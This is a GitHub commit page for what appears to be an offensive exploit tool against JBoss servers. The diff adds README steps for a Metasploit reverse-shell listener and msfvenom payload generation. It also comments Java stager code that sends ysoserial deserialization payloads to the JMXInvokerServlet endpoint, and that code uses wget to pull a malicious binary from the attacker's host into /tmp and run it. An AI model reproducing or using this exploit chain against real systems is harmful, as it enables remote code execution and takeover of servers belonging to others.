Skip to content

Commit

Permalink
Updated README with general information and added comments to Stager
Browse files Browse the repository at this point in the history
  • Loading branch information
njfox committed Nov 17, 2015
1 parent 7ac08e4 commit b59ab77
Show file tree
Hide file tree
Showing 2 changed files with 22 additions and 0 deletions.
15 changes: 15 additions & 0 deletions README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -27,6 +27,21 @@ Coming soon.

Coming soon.


## Requirements

1. Metasploit Framework -- You must have a listener running in msfconsole before running this exploit. Example:
```shell
# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/shell/reverse_tcp
msf exploit(handler) > set LHOST <local ip>
msf exploit(handler) > set LPORT <local port>
msf exploit(handler) > exploit
```

2. msfvenom must be installed and available in your PATH. This command is used to generate the reverse shell payload.

## Installation

1. Download the latest jar from the "releases" section.
Expand Down
7 changes: 7 additions & 0 deletions src/main/java/jbossexploit/Stager.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17,6 +17,8 @@ public static void sendPayload(int stage, String rhost, int rport, String lhost,
ysoserial.GeneratePayload ysoserial = new ysoserial.GeneratePayload();
String command = null;

// I was unable to chain commands ("&&") during testing, so we'll send 3 separate requests to download and execute
// the malicious binary
switch (stage) {
case 0:
command = "wget -O /tmp/" + binaryName + " http://" + lhost + ":" + wport + "/" + binaryName;
Expand All @@ -37,6 +39,8 @@ public static void sendPayload(int stage, String rhost, int rport, String lhost,
String url = "http://" + rhost + ":" + rport + "/invoker/JMXInvokerServlet";

DefaultHttpClient httpClient = new DefaultHttpClient();

// http://stackoverflow.com/questions/2836646/java-serializable-object-to-byte-array
ByteArrayOutputStream bos = new ByteArrayOutputStream();
ObjectOutput out = null;
byte[] payloadBytes = null;
Expand Down Expand Up @@ -70,6 +74,9 @@ public static void sendPayload(int stage, String rhost, int rport, String lhost,
}

public static class HttpGetWithEntity extends HttpEntityEnclosingRequestBase {
// Allows adding content to the body of a GET request, as required by ysoserial
// http://stackoverflow.com/questions/12535016/apache-httpclient-get-with-body

public final static String METHOD_NAME = "GET";

@Override
Expand Down

0 comments on commit b59ab77

Please sign in to comment.